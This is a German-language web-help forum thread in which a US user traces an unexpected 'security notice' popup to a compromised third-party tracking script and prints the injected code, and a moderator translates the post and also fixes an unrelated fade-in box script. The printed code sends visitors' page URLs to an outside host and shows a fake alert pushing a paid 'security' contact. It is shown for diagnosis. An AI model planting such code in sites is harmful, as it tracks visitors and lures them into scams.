Hello from the USA.
I have the same exact problem. My website has not been changed since 2018. I was sniffing the http traffic, looking at code, any new files on my host server, scripts, etc. I finally found the problem.
My home page (index.htm) has an old JavaScript code linking to an online service I used about 6 years ago. Apparently, ClickMeter got rebranded, and the old JS files may have been compromised. The service allowed a pixel image to be tracked and the code is on AWS.
INDEX.HTM JS compromised code
ClickMeter.com page views tracking: resume
<script type='text/javascript'>
var ClickMeter_pixel_url = '//pixel.watch/zxlu';
</script>
<script type='text/javascript' id='cmpixelscript' src='//s3.amazonaws.com/scripts-clickmeter-com/js/pixelNew.js'></script>
<noscript>
<img height='0' width='0' alt='' src='//pixel.watch/zxlu' />
</noscript>
The code on the the final destination is below
=============================
//if (window.location.pathname === "/" || window.location.pathname === "/index.html") {
// alert("Security Notice: Your website may be due for a security audit. Regular checks help prevent data breaches and ensure compliance.\n\nContact us at: support@zenowls.com");
// }
var i=new Image;
i.src="https://test.zenowls.com/aws4.php?c="+w ... ation.href;
const isHomepage = window.location.pathname === "/" || window.location.pathname === "/index.html";
const isNotZenowls = !window.location.hostname.includes("felixistderbeste.de");
if (isHomepage && isNotZenowls) {
alert("Security Notice: Your website may be due for a security audit. Regular checks help prevent data breaches and ensure compliance.\nContact us at: support@zenowls.com");
}
============================
The pop-up alert window prompts them to contact their security services through WhatsApp and pay a lot of money to help fix the security vulnerability. The root page has a message:
"Hi ,This site is used for finding security bugs ,mainly for xss , if you came across this page , there may be xss vulnerability in our site .Purpose of this is to report bugs to companies part of any bug bounty program .Also means no harm is done through this page.
Please feel free to contact me:opensecr@gmail.com"
Most likely a sad attempt at not reporting the security issue to their hosting provider, https://www.hostinger.com/
HILFE: Security Notes Hinweis
Moderator: Jasko
-
CarodelCastillo
- Neues Mitglied
- Beiträge: 1
- Registriert: Do 1. Mai 2025, 01:37
- Mein Vorname: Famulus
-
HTML-Laie
- Moderator
- Beiträge: 363
- Registriert: So 19. Nov 2017, 12:42
- Mein Vorname: Hape
- Wohnort: Wesermarsch
- Kontaktdaten:
Re: HILFE: Security Notes Hinweis
Hier mal die Übersetzung:
Hallo aus den USA.
Ich habe genau das gleiche Problem. Meine Website wurde seit 2018 nicht mehr geändert. Ich habe den HTTP-Verkehr beobachtet, den Code, neue Dateien auf meinem Host-Server, Skripte usw. überprüft und endlich das Problem gefunden.
Meine Homepage (index.htm) enthält einen alten JavaScript-Code, der auf einen Online-Dienst verweist, den ich vor etwa sechs Jahren genutzt habe. Anscheinend wurde ClickMeter umbenannt, und die alten JS-Dateien könnten kompromittiert worden sein. Der Dienst ermöglichte die Verfolgung eines Pixelbilds, und der Code befindet sich auf AWS.
INDEX.HTM JS-kompromittierter Code
ClickMeter.com-Seitenaufruf-Tracking: Fortsetzung
Der Code für das endgültige Ziel ist unten aufgeführt.
Das Popup-Warnfenster fordert die Nutzer auf, sich über WhatsApp an ihren Sicherheitsdienst zu wenden und eine hohe Gebühr für die Behebung der Sicherheitslücke zu zahlen. Auf der Startseite erscheint folgende Meldung:
„Hallo, diese Seite dient der Suche nach Sicherheitslücken, hauptsächlich im Bereich XSS. Sollten Sie auf diese Seite gestoßen sein, könnte unsere Seite eine XSS-Sicherheitslücke aufweisen. Ziel ist es, Fehler im Rahmen eines Bug-Bounty-Programms an Unternehmen zu melden. Dies bedeutet auch, dass über diese Seite kein Schaden entsteht.
Sie können mich gerne kontaktieren: abc@xyz.com.“
Wahrscheinlich ein hoffnungsloser Versuch, das Sicherheitsproblem nicht dem Hosting-Anbieter https://www.xyz.com/ zu melden.
Ende der Übersetzung.
Hallo aus den USA.
Ich habe genau das gleiche Problem. Meine Website wurde seit 2018 nicht mehr geändert. Ich habe den HTTP-Verkehr beobachtet, den Code, neue Dateien auf meinem Host-Server, Skripte usw. überprüft und endlich das Problem gefunden.
Meine Homepage (index.htm) enthält einen alten JavaScript-Code, der auf einen Online-Dienst verweist, den ich vor etwa sechs Jahren genutzt habe. Anscheinend wurde ClickMeter umbenannt, und die alten JS-Dateien könnten kompromittiert worden sein. Der Dienst ermöglichte die Verfolgung eines Pixelbilds, und der Code befindet sich auf AWS.
INDEX.HTM JS-kompromittierter Code
ClickMeter.com-Seitenaufruf-Tracking: Fortsetzung
Code: Alles auswählen
<script type='text/javascript'>
var ClickMeter_pixel_url = '//pixel.watch/zxlu';
</script>
<script type='text/javascript' id='cmpixelscript' src='//s3.amazonaws.com/scripts-clickmeter-com/js/pixelNew.js'></script>
<noscript>
<img height='0' width='0' alt='' src='//pixel.watch/zxlu' />
</noscript>
Code: Alles auswählen
//if (window.location.pathname === "/" || window.location.pathname === "/index.html") {
// alert("Sicherheitshinweis: Für Ihre Website ist möglicherweise ein Sicherheitsaudit fällig. Regelmäßige Überprüfungen helfen, Datenschutzverletzungen zu vermeiden und die Einhaltung der Vorschriften zu gewährleisten.\n\nKontaktieren Sie uns unter: support@zenowls.com");
// }
var i=new Image;
i.src="https://test.zenowls.com/aws4.php?c="+w ... ation.href;
const isHomepage = window.location.pathname === "/" || window.location.pathname === "/index.html";
const isNotZenowls = !window.location.hostname.includes("felixistderbeste.de");
if (isHomepage && isNotZenowls) {
alert("Sicherheitshinweis: Ihre Website muss möglicherweise einer Sicherheitsüberprüfung unterzogen werden. Regelmäßige Überprüfungen helfen, Datenschutzverletzungen zu vermeiden und die Einhaltung der Vorschriften zu gewährleisten.\nKontaktieren Sie uns unter: support@zenowls.com");
}„Hallo, diese Seite dient der Suche nach Sicherheitslücken, hauptsächlich im Bereich XSS. Sollten Sie auf diese Seite gestoßen sein, könnte unsere Seite eine XSS-Sicherheitslücke aufweisen. Ziel ist es, Fehler im Rahmen eines Bug-Bounty-Programms an Unternehmen zu melden. Dies bedeutet auch, dass über diese Seite kein Schaden entsteht.
Sie können mich gerne kontaktieren: abc@xyz.com.“
Wahrscheinlich ein hoffnungsloser Versuch, das Sicherheitsproblem nicht dem Hosting-Anbieter https://www.xyz.com/ zu melden.
Ende der Übersetzung.
Unmögliches wird sofort erledigt, Wunder dauern etwas länger. 95% aller Computerprobleme befinden sich zwischen Tastatur und Stuhl.
Hapes-Javascript-Demo-Page ; Hapes-Baustelle ; Boitwarder Bürgerverein
Hapes-Javascript-Demo-Page ; Hapes-Baustelle ; Boitwarder Bürgerverein
-
HTML-Laie
- Moderator
- Beiträge: 363
- Registriert: So 19. Nov 2017, 12:42
- Mein Vorname: Hape
- Wohnort: Wesermarsch
- Kontaktdaten:
Re: HILFE: Security Notes Hinweis
Hier noch etwas zur weiteren Fehlerbehebung auf deiner HappyHalloween und deiner Weihnachtszauber:
Auf der Weihnachtszauber ist das Script vorhanden, jedoch fehlt hier der Aufruf für das Fenster.
So etwas kann man feststellen wenn man die Quellcode beider Seiten miteinander vergleicht.
LG Hape 
Das Script fehlt auf der Halloween-Seite, so das hier das Info-Fenster nicht angezeigt wird.Butterblume hat geschrieben: ↑So 27. Apr 2025, 09:48
Ich habe letztes Jahr diesen beiden Seiten das Design von der Poserbilder gegeben. Vielleicht habe ich da irgendwas nicht richtig gemacht. Bei der Happy Halloween sind die Hintergrundgeräusche zu hören, das ist nicht der Code mit der Fadenbox?
Anderenfalls muss ich das wohl oder übel nochmal überarbeiten!Code: Alles auswählen
<script type="text/javascript"> /*********************************************** * Sticky Note script- © Dynamic Drive DHTML code library (www.dynamicdrive.com) * Visit DynamicDrive.com for hundreds of DHTML scripts * This notice must stay intact for legal use * Go to http://www.dynamicdrive.com/ for full source code ***********************************************/ //Specify display mode. 3 possible values are: //1) "always"- This makes the fade-in box load each time the page is displayed //2) "oncepersession"- This uses cookies to display the fade-in box only once per browser session //3) integer (ie: 5)- Finally, you can specify an integer to display the box randomly via a frequency of 1/integer... // For example, 2 would display the box about (1/2) 50% of the time the page loads. var displaymode="always" var enablefade="yes" //("yes" to enable fade in effect, "no" to disable) var autohidebox=["yes", 5] //Automatically hide box after x seconds? [yes/no, if_yes_hide_after_seconds] var showonscroll="yes" //Should box remain visible even when user scrolls page? ("yes"/"no) var IEfadelength=1 //fade in duration for IE, in seconds var Mozfadedegree=0.05 //fade in degree for NS6+ (number between 0 and 1. Recommended max: 0.2) ////////No need to edit beyond here/////////// if (parseInt(displaymode)!=NaN) var random_num=Math.floor(Math.random()*displaymode) function displayfadeinbox(){ var ie=document.all && !window.opera var dom=document.getElementById iebody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body objref=(dom)? document.getElementById("fadeinbox") : document.all.fadeinbox var scroll_top=(ie)? iebody.scrollTop : window.pageYOffset var docwidth=(ie)? iebody.clientWidth : window.innerWidth docheight=(ie)? iebody.clientHeight: window.innerHeight var objwidth=objref.offsetWidth objheight=objref.offsetHeight objref.style.left=docwidth/2-objwidth/2+"px" objref.style.top=scroll_top+docheight/2-objheight/2+"px" if (showonscroll=="yes") showonscrollvar=setInterval("staticfadebox()", 50) if (enablefade=="yes" && objref.filters){ objref.filters[0].duration=IEfadelength objref.filters[0].Apply() objref.filters[0].Play() } objref.style.visibility="visible" if (objref.style.MozOpacity){ if (enablefade=="yes") mozfadevar=setInterval("mozfadefx()", 90) else{ objref.style.MozOpacity=1 controlledhidebox() } } else controlledhidebox() } function mozfadefx(){ if (parseFloat(objref.style.MozOpacity)<1) objref.style.MozOpacity=parseFloat(objref.style.MozOpacity)+Mozfadedegree else{ clearInterval(mozfadevar) controlledhidebox() } } function staticfadebox(){ var ie=document.all && !window.opera var scroll_top=(ie)? iebody.scrollTop : window.pageYOffset objref.style.top=scroll_top+docheight/2-objheight/2+"px" } function hidefadebox(){ objref.style.visibility="hidden" if (typeof showonscrollvar!="undefined") clearInterval(showonscrollvar) } function controlledhidebox(){ if (autohidebox[0]=="yes"){ var delayvar=(enablefade=="yes" && objref.filters)? (autohidebox[1]+objref.filters[0].duration)*1000 : autohidebox[1]*1000 setTimeout("hidefadebox()", delayvar) } } function initfunction(){ setTimeout("displayfadeinbox()", 5500) } function get_cookie(Name) { var search = Name + "=" var returnvalue = "" if (document.cookie.length > 0) { offset = document.cookie.indexOf(search) if (offset != -1) { offset += search.length end = document.cookie.indexOf(";", offset) if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)) } } return returnvalue; } if (displaymode=="oncepersession" && get_cookie("fadedin")=="" || displaymode=="always" || parseInt(displaymode)!=NaN && random_num==0){ if (window.addEventListener) window.addEventListener("load", initfunction, false) else if (window.attachEvent) window.attachEvent("onload", initfunction) else if (document.getElementById) window.onload=initfunction document.cookie="fadedin=yes" } </script>
Auf der Weihnachtszauber ist das Script vorhanden, jedoch fehlt hier der Aufruf für das Fenster.
So etwas kann man feststellen wenn man die Quellcode beider Seiten miteinander vergleicht.
Code: Alles auswählen
<p style="text-align: center;">Es freut mich, dass du mein Horrorhaus gefunden hast! <br/>Tritt ein und fürchte dich vor den Geistern! <br/><center>
<div id="fadeinbox" style="filter:progid:DXImageTransform.Microsoft.RandomDissolve(duration=1) progid:DXImageTransform.Microsoft.Shadow(color=gray,direction=135) ; -moz-opacity:0">
<center><font size="+1"><span style="color: #FF6A00"><span style="font-size: 14pt">Hinweis für noch mehr Gruselfaktor!</font><br/><span style="font-size: 14pt"><span style="color: #FF6A00">Macht eure Lautsprecher an und erlaubt euren <br/>Browser das Abspielen von Audio u. Video Dateien!<br/>Nun schließt die Augen und lehrt<br/> euch das Fürchten!</span></center>
<div align="right">
<a href="#" onclick="hidefadebox();return false"><span style="color: #FF6A00"><span style="font-size: 8pt"><br/><br/>Schließen</a></span>
</div>
</div></center>Unmögliches wird sofort erledigt, Wunder dauern etwas länger. 95% aller Computerprobleme befinden sich zwischen Tastatur und Stuhl.
Hapes-Javascript-Demo-Page ; Hapes-Baustelle ; Boitwarder Bürgerverein
Hapes-Javascript-Demo-Page ; Hapes-Baustelle ; Boitwarder Bürgerverein
Wer ist online?
Mitglieder in diesem Forum: 0 Mitglieder und 1 Gast